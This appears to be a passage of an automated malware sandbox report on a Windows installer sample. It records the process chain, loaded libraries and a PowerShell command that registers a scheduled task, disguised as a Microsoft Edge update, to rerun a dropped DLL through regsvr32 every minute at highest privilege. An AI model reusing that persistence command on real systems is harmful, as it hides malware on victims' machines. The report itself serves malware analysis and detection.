Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2AE2E016_2_00007FFDFB2AE2E0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB20476016_2_00007FFDFB204760
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2A4B8016_2_00007FFDFB2A4B80
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB301A6016_2_00007FFDFB301A60
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2369D016_2_00007FFDFB2369D0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2049D416_2_00007FFDFB2049D4
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2049BA16_2_00007FFDFB2049BA
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB201A4316_2_00007FFDFB201A43
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB27BA3016_2_00007FFDFB27BA30
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2A7A3016_2_00007FFDFB2A7A30
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB20689016_2_00007FFDFB206890
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB27595016_2_00007FFDFB275950
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2E001016_2_00007FFDFB2E0010
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB20FE9016_2_00007FFDFB20FE90
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB22A04016_2_00007FFDFB22A040
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB20FE9016_2_00007FFDFB20FE90
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB229E8016_2_00007FFDFB229E80
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2ABE8016_2_00007FFDFB2ABE80
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB208EC016_2_00007FFDFB208EC0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21BEA016_2_00007FFDFB21BEA0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB219F0016_2_00007FFDFB219F00
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21ADA016_2_00007FFDFB21ADA0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2B4DE016_2_00007FFDFB2B4DE0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB224C9016_2_00007FFDFB224C90
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2DDC6016_2_00007FFDFB2DDC60
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB22B3E016_2_00007FFDFB22B3E0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB28545016_2_00007FFDFB285450
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB30142016_2_00007FFDFB301420
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB28F2D016_2_00007FFDFB28F2D0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB22A32016_2_00007FFDFB22A320
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB22A1C016_2_00007FFDFB22A1C0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2F31C016_2_00007FFDFB2F31C0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2750C016_2_00007FFDFB2750C0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2060E016_2_00007FFDFB2060E0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB22D15016_2_00007FFDFB22D150
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2177B016_2_00007FFDFB2177B0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB25B67016_2_00007FFDFB25B670
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21A66016_2_00007FFDFB21A660
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2E86C016_2_00007FFDFB2E86C0
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB22574016_2_00007FFDFB225740
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB21B61016_2_00007FFDFB21B610
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB2B861016_2_00007FFDFB2B8610
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB25B47016_2_00007FFDFB25B470
Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFDFB2EBA00 appears 51 times
Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFDFB2EB770 appears 48 times
Source: file.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: file.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: file.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-DOVSB.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-DOVSB.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-D8FFC.tmp.6.drStatic PE information: Number of sections : 11 > 10
Source: file.exe, 00000000.00000003.1748200530.00000000025E2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exe, 00000000.00000003.1748510327.000000007FE3E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs file.exe
Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engineClassification label: mal80.evad.winEXE@26/24@1/2
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB211C60 GetDiskFreeSpaceExW,16_2_00007FFDFB211C60
Source: C:\Windows\System32\regsvr32.exeCode function: 16_2_00007FFDFB214380 CoCreateInstance,16_2_00007FFDFB214380
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpFile created: C:\Users\user\AppData\Local\unins000.datJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\MUTEX
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7536:120:WilError_03
Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\JL55FnNsh@T5
Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\is-B2398.tmpJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXES
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmp" /SL5="$10478,1389145,140800,C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmp" /SL5="$700F8,1389145,140800,C:\Users\user\Desktop\file.exe" /VERYSILENT /SUPPRESSMSGBOXESJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:INSTALL "C:\Users\user\AppData\Roaming\\PoisedCoyote.dll"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D7C2DB06-FCF6-4992-AF37-53F140CD5A88}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\PoisedCoyote.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B2398.tmp\file.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KCPL5.tmp\file.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: perfos.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
